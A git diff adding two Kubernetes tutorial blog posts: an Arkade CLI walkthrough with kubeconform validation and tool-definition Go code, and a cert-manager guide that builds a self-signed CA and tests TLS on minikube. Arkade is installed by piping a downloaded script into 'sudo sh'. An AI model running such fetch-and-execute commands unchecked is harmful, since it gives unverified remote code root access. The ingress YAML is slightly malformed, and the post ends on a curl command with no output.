diff --git a/content/en/blog/Arkade 2.png b/content/en/blog/Arkade 2.png new file mode 100644 index 0000000..0ca9581 Binary files /dev/null and b/content/en/blog/Arkade 2.png differ diff --git a/content/en/blog/_index 2.md b/content/en/blog/_index 2.md new file mode 100644 index 0000000..a69ea64 --- /dev/null +++ b/content/en/blog/_index 2.md @@ -0,0 +1,6 @@ +--- +title: blog +url: "/blog" +aliases: +- "/blog" +--- diff --git a/content/en/blog/arkade 2.md b/content/en/blog/arkade 2.md new file mode 100644 index 0000000..84a4fde --- /dev/null +++ b/content/en/blog/arkade 2.md @@ -0,0 +1,587 @@ +--- +title : Arkade Open Source Marketplace for Kubernetes +author : Sangam Biradar +categories : + - Kubernetes +weight : 10 +description : add magic to your CLI with Arkade and Increase Productivity +draft : false +Date : 2023-02-13 +author : Sangam Biradar +slug : arkade-open-source-marketplace-for-kubernetes +--- + +{{< rawhtml >}} + + +{{< /rawhtml >}} + +### Getting started with Arkade CLI + +- Macos/Linux + +```bash + +~ curl -sLS https://get.arkade.dev | sudo sh + +Password: +Downloading package https://github.com/alexellis/arkade/releases/download/0.9.7/arkade-darwin-arm64 as /tmp/arkade-darwin-arm64 +Download complete. + +Running with sufficient permissions to attempt to move arkade to /usr/local/bin +New version of arkade installed to /usr/local/bin +Creating alias 'ark' for 'arkade'. + _ _ + __ _ _ __| | ____ _ __| | ___ + / _` | '__| |/ / _` |/ _` |/ _ \ +| (_| | | | < (_| | (_| | __/ + \__,_|_| |_|\_\__,_|\__,_|\___| + +Open Source Marketplace For Developer Tools + +Version: 0.9.7 +Git Commit: 461fb7a9d05d7e3d13a39e03e1e38b6936cb15bd + + 🐳 arkade needs your support: https://github.com/sponsors/alexellis +➜ ~ + +``` + +### Get list of most needed tools & CLI for all Kubenetes Developer + +```bash +➜ ~ arkade get ++------------------+--------------------------------------------------------------+ +| TOOL | DESCRIPTION | ++------------------+--------------------------------------------------------------+ +| actions-usage | Get usage insights from GitHub Actions. | ++------------------+--------------------------------------------------------------+ +| actuated-cli | Official CLI for actuated.dev | ++------------------+--------------------------------------------------------------+ +| argocd | Declarative, GitOps continuous delivery tool for Kubernetes. | ++------------------+--------------------------------------------------------------+ +| argocd-autopilot | An opinionated way of installing Argo-CD and managing GitOps | +| | repositories. | ++------------------+--------------------------------------------------------------+ +| arkade | Portable marketplace for downloading your favourite devops | +| | CLIs and installing helm charts, with a single command. | ++------------------+--------------------------------------------------------------+ +| autok3s | Run Rancher Lab's lightweight Kubernetes distribution k3s | +| | everywhere. | ++------------------+--------------------------------------------------------------+ +| buildx | Docker CLI plugin for extended build capabilities with | +| | BuildKit. | ++------------------+--------------------------------------------------------------+ +| bun | Bun is an incredibly fast JavaScript runtime, bundler, | +| | transpiler and package manager – all in one. | ++------------------+--------------------------------------------------------------+ +| butane | Translates human readable Butane Configs into machine | +| | readable Ignition Configs | ++------------------+--------------------------------------------------------------+ +| caddy | Caddy is an extensible server platform that uses TLS by | +| | default | ++------------------+--------------------------------------------------------------+ +| cilium | CLI to install, manage & troubleshoot Kubernetes clusters | +| | running Cilium. | ++------------------+--------------------------------------------------------------+ +| civo | CLI for interacting with your Civo resources. | ++------------------+--------------------------------------------------------------+ +| clusterawsadm | Kubernetes Cluster API Provider AWS Management Utility | ++------------------+--------------------------------------------------------------+ +| clusterctl | The clusterctl CLI tool handles the lifecycle of a Cluster | +| | API management cluster | ++------------------+--------------------------------------------------------------+ +| cmctl | cmctl is a CLI tool that helps you manage cert-manager and | +| | its resources inside your cluster. | ++------------------+--------------------------------------------------------------+ +| conftest | Write tests against structured configuration data using the | +| | Open Policy Agent Rego query language | ++------------------+--------------------------------------------------------------+ +| cosign | Container Signing, Verification and Storage in an OCI | +| | registry. | ++------------------+--------------------------------------------------------------+ +| cr | Hosting Helm Charts via GitHub Pages and Releases | ++------------------+--------------------------------------------------------------+ +| crane | crane is a tool for interacting with remote images and | +| | registries | ++------------------+--------------------------------------------------------------+ +| croc | Easily and securely send things from one computer to another | ++------------------+--------------------------------------------------------------+ +| dagger | A portable devkit for CI/CD pipelines. | ++------------------+--------------------------------------------------------------+ +| devspace | Automate your deployment workflow with DevSpace and develop | +| | software directly inside Kubernetes. | ++------------------+--------------------------------------------------------------+ +| dive | A tool for exploring each layer in a docker image | ++------------------+--------------------------------------------------------------+ +| docker-compose | Define and run multi-container applications with Docker. | ++------------------+--------------------------------------------------------------+ +| doctl | Official command line interface for the DigitalOcean API. | ++------------------+--------------------------------------------------------------+ +| eksctl | Amazon EKS Kubernetes cluster management | ++------------------+--------------------------------------------------------------+ +| eksctl-anywhere | Run Amazon EKS on your own infrastructure | ++------------------+--------------------------------------------------------------+ +| faas-cli | Official CLI for OpenFaaS. | ++------------------+--------------------------------------------------------------+ +| firectl | Command-line tool that lets you run arbitrary Firecracker | +| | MicroVMs | ++------------------+--------------------------------------------------------------+ +| flux | Continuous Delivery solution for Kubernetes powered by | +| | GitOps Toolkit. | ++------------------+--------------------------------------------------------------+ +| flyctl | Command line tools for fly.io services | ++------------------+--------------------------------------------------------------+ +| fstail | Tail modified files in a directory. | ++------------------+--------------------------------------------------------------+ +| fzf | General-purpose command-line fuzzy finder | ++------------------+--------------------------------------------------------------+ +| gh | GitHub’s official command line tool. | ++------------------+--------------------------------------------------------------+ +| golangci-lint | Go linters aggregator. | ++------------------+--------------------------------------------------------------+ +| gomplate | A flexible commandline tool for template rendering. Supports | +| | lots of local and remote datasources. | ++------------------+--------------------------------------------------------------+ +| goreleaser | Deliver Go binaries as fast and easily as possible | ++------------------+--------------------------------------------------------------+ +| grafana-agent | Grafana Agent is a telemetry collector for sending | +| | metrics, logs, and trace data to the opinionated Grafana | +| | observability stack. | ++------------------+--------------------------------------------------------------+ +| grype | A vulnerability scanner for container images and filesystems | ++------------------+--------------------------------------------------------------+ +| hadolint | A smarter Dockerfile linter that helps you build best | +| | practice Docker images | ++------------------+--------------------------------------------------------------+ +| helm | The Kubernetes Package Manager: Think of it like | +| | apt/yum/homebrew for Kubernetes. | ++------------------+--------------------------------------------------------------+ +| helmfile | Deploy Kubernetes Helm Charts | ++------------------+--------------------------------------------------------------+ +| hey | Load testing tool | ++------------------+--------------------------------------------------------------+ +| hostctl | Dev tool to manage /etc/hosts like a pro! | ++------------------+--------------------------------------------------------------+ +| hubble | CLI for network, service & security observability for | +| | Kubernetes clusters running Cilium. | ++------------------+--------------------------------------------------------------+ +| hugo | Static HTML and CSS website generator. | ++------------------+--------------------------------------------------------------+ +| influx | InfluxDB’s command line interface (influx) is an interactive | +| | shell for the HTTP API. | ++------------------+--------------------------------------------------------------+ +| inlets-pro | Cloud Native Tunnel for HTTP and TCP traffic. | ++------------------+--------------------------------------------------------------+ +| inletsctl | Automates the task of creating an exit-server (tunnel | +| | server) on public cloud infrastructure. | ++------------------+--------------------------------------------------------------+ +| istioctl | Service Mesh to establish a programmable, application-aware | +| | network using the Envoy service proxy. | ++------------------+--------------------------------------------------------------+ +| jq | jq is a lightweight and flexible command-line JSON processor | ++------------------+--------------------------------------------------------------+ +| just | Just a command runner | ++------------------+--------------------------------------------------------------+ +| k0s | Zero Friction Kubernetes | ++------------------+--------------------------------------------------------------+ +| k0sctl | A bootstrapping and management tool for k0s clusters | ++------------------+--------------------------------------------------------------+ +| k10multicluster | Multi-cluster support for K10. | ++------------------+--------------------------------------------------------------+ +| k10tools | Tools for evaluating and debugging K10. | ++------------------+--------------------------------------------------------------+ +| k3d | Helper to run Rancher Lab's k3s in Docker. | ++------------------+--------------------------------------------------------------+ +| k3s | Lightweight Kubernetes | ++------------------+--------------------------------------------------------------+ +| k3sup | Bootstrap Kubernetes with k3s over SSH < 1 min. | ++------------------+--------------------------------------------------------------+ +| k9s | Provides a terminal UI to interact with your Kubernetes | +| | clusters. | ++------------------+--------------------------------------------------------------+ +| kail | Kubernetes log viewer. | ++------------------+--------------------------------------------------------------+ +| kanctl | Framework for application-level data management on | +| | Kubernetes. | ++------------------+--------------------------------------------------------------+ +| kgctl | A CLI to manage Kilo, a multi-cloud network overlay built on | +| | WireGuard and designed for Kubernetes. | ++------------------+--------------------------------------------------------------+ +| kim | Build container images inside of Kubernetes. (Experimental) | ++------------------+--------------------------------------------------------------+ +| kind | Run local Kubernetes clusters using Docker container nodes. | ++------------------+--------------------------------------------------------------+ +| kops | Production Grade K8s Installation, Upgrades, and Management. | ++------------------+--------------------------------------------------------------+ +| krew | Package manager for kubectl plugins. | ++------------------+--------------------------------------------------------------+ +| kube-bench | Checks whether Kubernetes is deployed securely by running | +| | the checks documented in the CIS Kubernetes Benchmark. | ++------------------+--------------------------------------------------------------+ +| kubebuilder | Framework for building Kubernetes APIs using custom resource | +| | definitions (CRDs). | ++------------------+--------------------------------------------------------------+ +| kubecm | Easier management of kubeconfig. | ++------------------+--------------------------------------------------------------+ +| kubeconform | A FAST Kubernetes manifests validator, with support for | +| | Custom Resources | ++------------------+--------------------------------------------------------------+ +| kubectl | Run commands against Kubernetes clusters | ++------------------+--------------------------------------------------------------+ +| kubectx | Faster way to switch between clusters. | ++------------------+--------------------------------------------------------------+ +| kubens | Switch between Kubernetes namespaces smoothly. | ++------------------+--------------------------------------------------------------+ +| kubescape | kubescape is the first tool for testing if Kubernetes | +| | is deployed securely as defined in Kubernetes Hardening | +| | Guidance by to NSA and CISA | ++------------------+--------------------------------------------------------------+ +| kubeseal | A Kubernetes controller and tool for one-way encrypted | +| | Secrets | ++------------------+--------------------------------------------------------------+ +| kubestr | Kubestr discovers, validates and evaluates your Kubernetes | +| | storage options. | ++------------------+--------------------------------------------------------------+ +| kubetail | Bash script to tail Kubernetes logs from multiple pods at | +| | the same time. | ++------------------+--------------------------------------------------------------+ +| kubeval | Validate your Kubernetes configuration files, supports | +| | multiple Kubernetes versions | ++------------------+--------------------------------------------------------------+ +| kumactl | kumactl is a CLI to interact with Kuma and its data | ++------------------+--------------------------------------------------------------+ +| kustomize | Customization of kubernetes YAML configurations | ++------------------+--------------------------------------------------------------+ +| lazygit | A simple terminal UI for git commands. | ++------------------+--------------------------------------------------------------+ +| linkerd2 | Ultralight, security-first service mesh for Kubernetes. | ++------------------+--------------------------------------------------------------+ +| mc | MinIO Client is a replacement for ls, cp, mkdir, diff and | +| | rsync commands for filesystems and object storage. | ++------------------+--------------------------------------------------------------+ +| metal | Official Equinix Metal CLI | ++------------------+--------------------------------------------------------------+ +| minikube | Runs the latest stable release of Kubernetes, with support | +| | for standard Kubernetes features. | ++------------------+--------------------------------------------------------------+ +| mixctl | A tiny TCP load-balancer. | ++------------------+--------------------------------------------------------------+ +| mkcert | A simple zero-config tool to make locally trusted | +| | development certificates with any names you'd like. | ++------------------+--------------------------------------------------------------+ +| nats | Utility to interact with and manage NATS. | ++------------------+--------------------------------------------------------------+ +| nats-server | Cloud native message bus and queue server | ++------------------+--------------------------------------------------------------+ +| nerdctl | Docker-compatible CLI for containerd, with support for | +| | Compose | ++------------------+--------------------------------------------------------------+ +| nova | Find outdated or deprecated Helm charts running in your | +| | cluster. | ++------------------+--------------------------------------------------------------+ +| oh-my-posh | A prompt theme engine for any shell that can display | +| | kubernetes information. | ++------------------+--------------------------------------------------------------+ +| opa | General-purpose policy engine that enables unified, | +| | context-aware policy enforcement across the entire stack. | ++------------------+--------------------------------------------------------------+ +| operator-sdk | Operator SDK is a tool for scaffolding and generating code | +| | for building Kubernetes operators | ++------------------+--------------------------------------------------------------+ +| osm | Open Service Mesh uniformly manages, secures, and gets | +| | out-of-the-box observability features. | ++------------------+--------------------------------------------------------------+ +| pack | Build apps using Cloud Native Buildpacks. | ++------------------+--------------------------------------------------------------+ +| packer | Build identical machine images for multiple platforms from a | +| | single source configuration. | ++------------------+--------------------------------------------------------------+ +| polaris | Run checks to ensure Kubernetes pods and controllers are | +| | configured using best practices. | ++------------------+--------------------------------------------------------------+ +| popeye | Scans live Kubernetes cluster and reports potential issues | +| | with deployed resources and configurations. | ++------------------+--------------------------------------------------------------+ +| porter | With Porter you can package your application artifact, | +| | tools, etc. as a bundle that can distribute and install. | ++------------------+--------------------------------------------------------------+ +| promtool | Prometheus rule tester and debugging utility | ++------------------+--------------------------------------------------------------+ +| rekor-cli | Secure Supply Chain - Transparency Log | ++------------------+--------------------------------------------------------------+ +| rpk | Kafka compatible streaming platform for mission critical | +| | workloads. | ++------------------+--------------------------------------------------------------+ +| run-job | Run a Kubernetes Job and get the logs when it's done. | ++------------------+--------------------------------------------------------------+ +| scaleway-cli | Scaleway CLI is a tool to help you pilot your Scaleway | +| | infrastructure directly from your terminal. | ++------------------+--------------------------------------------------------------+ +| sops | Simple and flexible tool for managing secrets | ++------------------+--------------------------------------------------------------+ +| stern | Multi pod and container log tailing for Kubernetes. | ++------------------+--------------------------------------------------------------+ +| syft | CLI tool and library for generating a Software Bill of | +| | Materials from container images and filesystems | ++------------------+--------------------------------------------------------------+ +| talosctl | The command-line tool for managing Talos Linux OS. | ++------------------+--------------------------------------------------------------+ +| tctl | Temporal CLI. | ++------------------+--------------------------------------------------------------+ +| terraform | Infrastructure as Code for major cloud providers. | ++------------------+--------------------------------------------------------------+ +| terragrunt | Terragrunt is a thin wrapper for Terraform that provides | +| | extra tools for working with multiple Terraform modules | ++------------------+--------------------------------------------------------------+ +| terrascan | Detect compliance and security violations across | +| | Infrastructure as Code. | ++------------------+--------------------------------------------------------------+ +| tfsec | Security scanner for your Terraform code | ++------------------+--------------------------------------------------------------+ +| tilt | A multi-service dev environment for teams on Kubernetes. | ++------------------+--------------------------------------------------------------+ +| tkn | A CLI for interacting with Tekton. | ++------------------+--------------------------------------------------------------+ +| trivy | Vulnerability Scanner for Containers and other Artifacts, | +| | Suitable for CI. | ++------------------+--------------------------------------------------------------+ +| vagrant | Tool for building and distributing development environments. | ++------------------+--------------------------------------------------------------+ +| vault | A tool for secrets management, encryption as a service, and | +| | privileged access management. | ++------------------+--------------------------------------------------------------+ +| vcluster | Create fully functional virtual Kubernetes clusters - Each | +| | vcluster runs inside a namespace of the underlying k8s | +| | cluster. | ++------------------+--------------------------------------------------------------+ +| viddy | A modern watch command. Time machine and pager etc. | ++------------------+--------------------------------------------------------------+ +| waypoint | Easy application deployment for Kubernetes and Amazon ECS | ++------------------+--------------------------------------------------------------+ +| yq | Portable command-line YAML processor. | ++------------------+--------------------------------------------------------------+ +There are 124 tools, use `arkade get NAME` to download one. +``` + +### Install any above tool with simple syntax + +```bash +arkade get < NAME OF TOOL > +``` + +### lets install one of tool + +kubeconform - A FAST Kubernetes manifests validator, with support for Custom Resources + +```bash +arkade get kubeconform + +``` + +output + + +```bash +Downloading: kubeconform +2023/04/02 10:12:06 Looking up version for kubeconform +2023/04/02 10:12:08 Found: v0.6.1 +Downloading: https://github.com/yannh/kubeconform/releases/download/v0.6.1/kubeconform-darwin-arm64.tar.gz +5.17 MiB / 5.17 MiB [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------] 100.00% +/var/folders/xy/3ssjv1j152x3_0ryt4yb982c0000gn/T/kubeconform-darwin-arm64.tar.gz written. +2023/04/02 10:12:11 Looking up version for kubeconform +2023/04/02 10:12:11 Found: v0.6.1 +2023/04/02 10:12:11 Extracted: /var/folders/xy/3ssjv1j152x3_0ryt4yb982c0000gn/T/kubeconform +2023/04/02 10:12:11 Copying /var/folders/xy/3ssjv1j152x3_0ryt4yb982c0000gn/T/kubeconform to /Users/sangambiradar/.arkade/bin/kubeconform + +Wrote: /Users/sangambiradar/.arkade/bin/kubeconform (9.824MB) + +# Add arkade binary directory to your PATH variable +export PATH=$PATH:$HOME/.arkade/bin/ + +# Test the binary: +/Users/sangambiradar/.arkade/bin/kubeconform + +# Or install with: +sudo mv /Users/sangambiradar/.arkade/bin/kubeconform /usr/local/bin/ + +🐳 arkade needs your support: https://github.com/sponsors/alexellis +➜ ~ export PATH=$PATH:$HOME/.arkade/bin/ +➜ ~ /Users/sangambiradar/.arkade/bin/kubeconform +2023/04/02 10:12:35 failing to read data from stdin +➜ ~ sudo mv /Users/sangambiradar/.arkade/bin/kubeconform /usr/local/bin/ +Password: +➜ ~ kubeconform +2023/04/02 10:13:00 failing to read data from stdin +➜ ~ kubeconform -h +Usage: kubeconform [OPTION]... [FILE OR FOLDER]... + -cache string + cache schemas downloaded via HTTP to this folder + -debug + print debug information + -exit-on-error + immediately stop execution when the first error is encountered + -h show help information + -ignore-filename-pattern value + regular expression specifying paths to ignore (can be specified multiple times) + -ignore-missing-schemas + skip files with missing schemas instead of failing + -insecure-skip-tls-verify + disable verification of the server's SSL certificate. This will make your HTTPS connections insecure + -kubernetes-version string + version of Kubernetes to validate against, e.g.: 1.18.0 (default "master") + -n int + number of goroutines to run concurrently (default 4) + -output string + output format - json, junit, tap, text (default "text") + -reject string + comma-separated list of kinds or GVKs to reject + -schema-location value + override schemas location search path (can be specified multiple times) + -skip string + comma-separated list of kinds or GVKs to ignore + -strict + disallow additional properties not in schema or duplicated keys + -summary + print a summary at the end (ignored for junit output) + -v show version information + -verbose + print results for all resources (ignored for tap and junit output) + +``` + +### lets create ngnix deployement and validate kubernetes manifest + +```yaml +apiVersion: v1 +kind: ReplicationController +metadata: + name: "bob" +spec: + replicas: asd" + selector: + app: nginx + templates: + metadata: + name: nginx + labels: + app: nginx + spec: + containers: + - name: nginx + image: nginx + ports: + - containerPort: 80 +``` + +### check it out if above kubenetes menifest Valid or not with Summary in Json format + +```bash +kubeconform -summary -output json ngnix.yaml +{ + "resources": [ + { + "filename": "ngnix.yaml", + "kind": "ReplicationController", + "name": "bob", + "version": "v1", + "status": "statusInvalid", + "msg": "problem validating schema. Check JSON formatting: jsonschema: '/spec/replicas' does not validate with https://raw.githubusercontent.com/yannh/kubernetes-json-schema/master/master-standalone/replicationcontroller-v1.json#/properties/spec/properties/replicas/type: expected integer or null, but got string", + "validationErrors": [ + { + "path": "/spec/replicas", + "msg": "expected integer or null, but got string" + } + ] + } + ], + "summary": { + "valid": 0, + "invalid": 1, + "errors": 0, + "skipped": 0 + } +} +``` +### add and contribute your favourite cloudNative Tool To arkade + +here is example one of tool - https://github.com/tenable/terrascan + + +- append your tool with dyanamic templating you will find lot of examples here to learn :- https://github.com/alexellis/arkade/blob/master/pkg/get/tools.go + +```bash +tools = append(tools, Tool{ +Owner: "tenable", +Repo: "terrascan", +Name: "terrascan", +Description: "Detect compliance and security violations across Infrastructure as Code.", BinaryTemplate: ` +{{$osStr := ""}} +{{ if HasPrefix .OS "ming" -}} +{{$osStr = "Windows"}} +{{- else if eq .OS "linux" -}} +{{$osStr = "Linux"}} +{{- else if eq .OS "darwin" -}} +{{$osStr = "Darwin"}} +{{- end -}} +{{$archStr := .Arch}} +{{- if eq .Arch "aarch64" -}} +{{$archStr = "arm64"}} +{{- else if eq .Arch "x86_64" -}} +{{$archStr = "x86_64"}} +{{- end -}} +{{.Name}}_{{slice .Version 1}}_{{$osStr}}_{{$archStr}}.tar.gz`, +}) +return tools } + +``` + +### write test cases for above tool + +```bash +func Test_DownloadTerrascan(t *testing.T) { tools := MakeTools() +name := "terrascan" +tool := getTool(name, tools) +tests := []test{ +{ +os: "darwin", +arch: arch64bit, +version: "v1.11.0", +url: `https://github.com/tenable/terrascan/releases/download/v1.11.0/terrascan_1.11.0_Darwin_x86_64.tar.gz`, +}, +{ +os: "darwin", +arch: archARM64, +version: "v1.11.0", +url: `https://github.com/tenable/terrascan/releases/download/v1.11.0/terrascan_1.11.0_Darwin_arm64.tar.gz`, +}, +{ +os: "linux", +arch: arch64bit, +version: "v1.11.0", +url: `https://github.com/tenable/terrascan/releases/download/v1.11.0/terrascan_1.11.0_Linux_x86_64.tar.gz`, +}, +{ +os: "linux", +arch: archARM64, +version: "v1.11.0", +url: `https://github.com/tenable/terrascan/releases/download/v1.11.0/terrascan_1.11.0_Linux_arm64.tar.gz`, +}, +{ +os: "ming", +arch: arch64bit, +version: "v1.11.0", +url: `https://github.com/tenable/terrascan/releases/download/v1.11.0/terrascan_1.11.0_Windows_x86_64.tar.gz`, +}, } +for _, tc := range tests { +t.Run(tc.os+" "+tc.arch+" "+tc.version, func(r *testing.T) { +got, err := tool.GetURL(tc.os, tc.arch, tc.version, false) if err != nil { +t.Fatal(err) } +if got != tc.url { +t.Errorf("want: %s, got: %s", tc.url, got) } +}) } +} + +``` + +Join [CloudNativeFolks Community](https://discord.gg/rEvr7vq) or Reach out to me on twitter [@sangamtwts](https://twitter.com/sangamtwts) \ No newline at end of file diff --git a/content/en/blog/certmanager/certmanager 2.png b/content/en/blog/certmanager/certmanager 2.png new file mode 100644 index 0000000..1618bfe Binary files /dev/null and b/content/en/blog/certmanager/certmanager 2.png differ diff --git a/content/en/blog/certmanager/index 2.md b/content/en/blog/certmanager/index 2.md new file mode 100644 index 0000000..3575f4f --- /dev/null +++ b/content/en/blog/certmanager/index 2.md @@ -0,0 +1,385 @@ +--- +title : CertManager - Automatically provision and manage TLS certificates in Kubernetes +author : Sangam Biradar +categories : + - Kubernetes +weight : 20 +description : cert-manager adds certificates and certificate issuers as resource types in Kubernetes clusters, and simplifies the process of obtaining, renewing and using those certificates. +draft : false +Date : 2023-02-14 +author : Sangam Biradar +--- + + + + + +{{< rawhtml >}} + +
+{{< /rawhtml >}} + +### Start Minikube +``` +minikube-certmanager git:(main) minikube start +πŸ˜„ minikube v1.30.0 on Darwin 13.3.1 (arm64) +✨ Using the docker driver based on existing profile +πŸ‘ Starting control plane node minikube in cluster minikube +🚜 Pulling base image ... +πŸƒ Updating the running docker "minikube" container ... +❗ Image was not built for the current minikube version. To resolve this you can delete and recreate your minikube cluster using the latest images. Expected minikube version: v1.29.0 -> Actual minikube version: v1.30.0 +🐳 Preparing Kubernetes v1.26.3 on Docker 23.0.2 ... +πŸ”Ž Verifying Kubernetes components... + β–ͺ Using image gcr.io/k8s-minikube/storage-provisioner:v5 +🌟 Enabled addons: storage-provisioner, default-storageclass +πŸ„ Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default +``` + +### add jetstack helm +``` +➜ minikube-certmanager git:(main) helm repo add jetstack https://charts.jetstack.io +"jetstack" has been added to your repositories +``` + +### update helm charts +``` +➜ minikube-certmanager git:(main) helm repo update +Hang tight while we grab the latest from your chart repositories... +...Successfully got an update from the "jetstack" chart repository +Update Complete. ⎈Happy Helming!⎈ +``` + +### Install cert-manger CRD on test namespace +``` +➜ minikube-certmanager git:(main) helm install \ + cert-manager jetstack/cert-manager \ + --namespace test \ + --create-namespace \ + --version v1.11.1 \ + --set installCRDs=true +NAME: cert-manager +LAST DEPLOYED: Fri Apr 14 12:35:31 2023 +NAMESPACE: test +STATUS: deployed +REVISION: 1 +TEST SUITE: None +NOTES: +cert-manager v1.11.1 has been deployed successfully! + +In order to begin issuing certificates, you will need to set up a ClusterIssuer +or Issuer resource (for example, by creating a 'letsencrypt-staging' issuer). + +More information on the different types of issuers and how to configure them +can be found in our documentation: + +https://cert-manager.io/docs/configuration/ + +For information on how to configure cert-manager to automatically provision +Certificates for Ingress resources, take a look at the `ingress-shim` +documentation: + +https://cert-manager.io/docs/usage/ingress/ + +``` + +### verify test namespace is active + +``` +➜ minikube-certmanager git:(main) kubectl get ns +NAME STATUS AGE +default Active 16h +kube-node-lease Active 16h +kube-public Active 16h +kube-system Active 16h +test Active 4m31s +``` + +### create self-signered certificate issuer + +creating a self-signed certificate that our CA will use. To do so we will first need to create a self-signed certificate issuer. + + +```yml +apiVersion: cert-manager.io/v1 +kind: Issuer +metadata: + name: selfsigned-issuer + namespace: test +spec: + selfSigned: {} +``` +### kubectl apply cert manager ss issuer + +``` +minikube-certmanager git:(main) βœ— kubectl create -f cert-manager-ss-issuer.yaml +issuer.cert-manager.io/selfsigned-issuer created +``` +### creat CA certificate + + +``` +apiVersion: cert-manager.io/v1 +kind: Certificate +metadata: + name: test-ca + namespace: test +spec: + isCA: true + commonName: test-ca + subject: + organizations: + - ACME Inc. + organizationalUnits: + - Widgets + secretName: test-ca-secret + privateKey: + algorithm: ECDSA + size: 256 + issuerRef: + name: selfsigned-issuer + kind: Issuer + group: cert-manager.io + +``` + +### kubectl apply cert-manager-ca-cert +``` +➜ minikube-certmanager git:(main) βœ— kubectl create -f cert-manager-ca-cert.yaml +certificate.cert-manager.io/test-ca created +``` +### checkt it out certificate +``` +➜ minikube-certmanager git:(main) βœ— kubectl -n test get certificate +NAME READY SECRET AGE +test-ca True test-ca-secret 4m15s +``` +### check it out secrets +``` +➜ minikube-certmanager git:(main) βœ— kubectl -n test get secret test-ca-secret +NAME TYPE DATA AGE +test-ca-secret kubernetes.io/tls 3 5m1s +``` +Excellent! This secret contains the ca.crt, tls.crt, and tls.key that belong to the CA itself. + +### create ca issuer + +Now it’s time to create our CA issuer. Create a file called cert-manager-ca-issuer.yaml with the following: + +``` +apiVersion: cert-manager.io/v1 +kind: Issuer +metadata: + name: test-ca-issuer + namespace: test +spec: + ca: + secretName: test-ca-secret +``` + +### apply ca issuer +``` +➜ minikube-certmanager git:(main) βœ— kubectl create -f cer +t-manager-ca-issuer.yaml +issuer.cert-manager.io/test-ca-issuer created +``` +### test ca cert + +``` +apiVersion: cert-manager.io/v1 +kind: Certificate +metadata: + name: test-server + namespace: test +spec: + secretName: test-server-tls + isCA: false + usages: + - server auth + - client auth + dnsNames: + - "test-server.test.svc.cluster.local" + - "test-server" + issuerRef: + name: test-ca-issuer +--- +apiVersion: cert-manager.io/v1 +kind: Certificate +metadata: + name: test-client + namespace: test +spec: + secretName: test-client-tls + isCA: false + usages: + - server auth + - client auth + dnsNames: + - "test-client.test.svc.cluster.local" + - "test-client" + issuerRef: + name: test-ca-issuer + +``` +### test server cert +``` +➜ minikube-certmanager git:(main) βœ— kubectl create -f test-server-cert.yaml +certificate.cert-manager.io/test-server created +certificate.cert-manager.io/test-client created +``` +### verify CA with Openssl +``` +➜ minikube-certmanager git:(main) βœ— openssl verify -CAfile \ +<(kubectl -n test get secret test-ca-secret -o jsonpath='{.data.ca\.crt}' | base64 -d) \ +<(kubectl -n test get secret test-server-tls -o jsonpath='{.data.tls\.crt}' | base64 -d) +/dev/fd/16: OK +/dev/fd/13: OK + +``` +### start openssl server get secrets tls + +``` + +minikube-certmanager git:(main) βœ— echo Hello World! > test.txt +minikube-certmanager git:(main) βœ— openssl s_server \ + -cert <(kubectl -n test get secret test-server-tls -o jsonpath='{.data.tls\.crt}' | base64 -d) \ + -key <(kubectl -n test get secret test-server-tls -o jsonpath='{.data.tls\.key}' | base64 -d) \ + -CAfile <(kubectl -n test get secret test-server-tls -o jsonpath='{.data.ca\.crt}' | base64 -d) \ + -WWW -port 12345 \ + -verify_return_error -Verify 1 +verify depth is 1, must return a certificate +Using auto DH parameters +ACCEPT +``` +### verify certificate working + +``` + ➜ minikube-certmanager git:(main) βœ— echo -e 'GET /test.txt HTTP/1.1\r\n\r\n' | \ + openssl s_client \ + -cert <(kubectl -n test get secret test-client-tls -o jsonpath='{.data.tls\.crt}' | base64 -d) \ + -key <(kubectl -n test get secret test-client-tls -o jsonpath='{.data.tls\.key}' | base64 -d) \ + -CAfile <(kubectl -n test get secret test-client-tls -o jsonpath='{.data.ca\.crt}' | base64 -d) \ + -connect localhost:12345 -quiet +depth=1 O = ACME Inc., OU = Widgets, CN = test-ca +verify return:1 +depth=0 +verify return:1 +HTTP/1.0 200 ok +Content-type: text/plain + +Hello World! +``` +### enable ingress on minikube +``` +➜ minikube-certmanager git:(main) βœ— minikube addons enable ingress +πŸ’‘ ingress is an addon maintained by Kubernetes. For any concerns contact minikube on GitHub. +You can view the list of minikube maintainers at: https://github.com/kubernetes/minikube/blob/master/OWNERS +πŸ’‘ After the addon is enabled, please run "minikube tunnel" and your ingress resources would be available at "127.0.0.1" + β–ͺ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20230312-helm-chart-4.5.2-28-g66a760794 + β–ͺ Using image registry.k8s.io/ingress-nginx/controller:v1.7.0 + β–ͺ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20230312-helm-chart-4.5.2-28-g66a760794 +πŸ”Ž Verifying ingress addon... +🌟 The 'ingress' addon is enabled + +``` +### Echo Server Setup with CA Signed Certificate + +``` +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + app: echo + name: echo + namespace: test +spec: + replicas: 1 + selector: + matchLabels: + app: echo + template: + metadata: + labels: + app: echo + spec: + containers: + - name: echo + image: fdeantoni/echo-server + imagePullPolicy: Always + ports: + - containerPort: 9000 + readinessProbe: + httpGet: + path: / + port: 9000 + initialDelaySeconds: 5 + periodSeconds: 5 + successThreshold: 1 +--- +apiVersion: v1 +kind: Service +metadata: + name: echo-service + namespace: test +spec: + selector: + app: echo + ports: + - name: http + protocol: TCP + port: 9000 + targetPort: 9000 +--- +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: echo-ingress + namespace: test + annotations: + cert-manager.io/issuer: test-ca-issuer +spec: + rules: + - http: + paths: + - path: /test + pathType: Prefix + backend: + service: + name: echo-service + port: + number: 9000 +tls: +- hosts: + - echo.info + secretName: echo-cert + +``` + +### deploy echo service + +``` +➜ minikube-certmanager git:(main) βœ— kubectl create -f echo-server.yaml +deployment.apps/echo created +service/echo-service created +``` +### start minikube tunnel +``` +➜ minikube-certmanager git:(main) βœ— minikube tunnel +βœ… Tunnel successfully started + +πŸ“Œ NOTE: Please do not close this terminal as this process must stay alive for the tunnel to be accessible ... +``` + +### echo service works with our CA signed certificate. +``` +➜ minikube-certmanager git:(main) βœ— curl --cacert <(kubectl -n test get secret echo-server-cert -o jsonpath='{.data.ca\.crt}' | base64 -d) https://echo.info/test 